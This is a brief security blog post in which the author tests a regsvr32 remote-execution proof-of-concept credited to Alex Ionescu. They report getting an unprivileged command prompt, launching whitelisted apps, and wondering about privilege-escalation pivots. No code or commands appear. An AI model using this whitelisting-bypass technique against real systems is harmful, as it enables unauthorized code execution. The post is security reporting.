So Alex Ionescu posted this morning about a remote execution via regsvr32.
I tested the POC and what do you know… it WORKS!
First off – Running Alex’s script does give me a Command Prompt
Now I tried this on a guest account and same results – I get a command prompt
So next step – Try to run something that requires Privilege
Ok ok some sanity has returned so default it runs in unprivileged. BUT I can run an whitelisted app from command: CALC.exe, WORD.exe
hmmmm… this is dangerous and my mind is blown at what pivots I can use to privilege escalate.
Stay safe and BIG Thanks to Alex Ionescu for finding this!!!
Cybersyrup Information Security blog 